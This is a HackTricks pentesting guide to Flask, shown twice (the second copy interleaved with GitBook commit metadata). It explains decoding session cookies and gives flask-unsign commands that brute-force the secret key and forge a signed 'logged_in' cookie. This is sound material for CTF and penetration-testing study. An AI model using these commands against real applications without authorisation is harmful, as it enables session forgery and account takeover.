hacktricks/pentesting/pentesting-web/flask.md

# Flask

**Probably if you are playing a CTF a Flask application will be related to** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**.**

## Cookies

Default cookie session name is **`session`**.

### Decoder

Online Flask coockies decoder: [https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi)

#### Manual

Get the first part of the cookie until the first point and Base64 decode it>

```bash
echo "ImhlbGxvIg" | base64 -d
```

The cookie is also signed using a password

### &#x20;**Flask-Unsign**

Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.

{% embed url="https://pypi.org/project/flask-unsign/" %}

```bash
pip3 install flask-unsign
```

#### **Decode Cookie**

```bash
flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'
```

#### **Brute Force**

```bash
flask-unsign --unsign --cookie < cookie.txt
```

#### **Signing**

```bash
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
```

#### Signing using legacy (old versions)

```bash
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
```

### SQLi in Flask session cookie with SQLmap

[**This example**](../../pentesting-web/sql-injection/sqlmap/#eval) **** uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret.
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`# Flask`

GitBook: [#2876] save 2021-11-30 16:46:07 +00:00			`Probably if you are playing a CTF a Flask application will be related to [SSTI](../../pentesting-web/ssti-server-side-template-injection/).`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`## Cookies`

GitBook: [master] one page modified 2020-11-22 23:24:53 +00:00			Default cookie session name is `session`.

GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`### Decoder`

			`Online Flask coockies decoder: [https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi)`

			`#### Manual`

GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`Get the first part of the cookie until the first point and Base64 decode it>`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [master] one page modified 2020-11-22 21:41:06 +00:00			```bash
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`echo "ImhlbGxvIg" \| base64 -d`
			```

			`The cookie is also signed using a password`

GitBook: [#2876] save 2021-11-30 16:46:07 +00:00			`### Flask-Unsign`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.`

			`{% embed url="https://pypi.org/project/flask-unsign/" %}`

GitBook: [master] one page modified 2020-11-22 21:41:06 +00:00			```bash
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`pip3 install flask-unsign`
			```

			`#### Decode Cookie`

GitBook: [master] one page modified 2020-11-22 21:41:06 +00:00			```bash
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'`
			```

			`#### Brute Force`

GitBook: [master] one page modified 2020-11-22 21:41:06 +00:00			```bash
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`flask-unsign --unsign --cookie < cookie.txt`
			```

			`#### Signing`

GitBook: [master] one page modified 2020-11-22 21:41:06 +00:00			```bash
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'`
			```

GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`#### Signing using legacy (old versions)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [master] one page modified 2020-11-22 21:41:06 +00:00			```bash
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy`
			```

GitBook: [master] 2 pages modified 2021-06-25 15:27:40 +00:00			`### SQLi in Flask session cookie with SQLmap`

GitBook: [#2876] save 2021-11-30 16:46:07 +00:00			[This example](../../pentesting-web/sql-injection/sqlmap/#eval) ** uses sqlmap `eval` option to automatically sign sqlmap payloads** for flask using a known secret.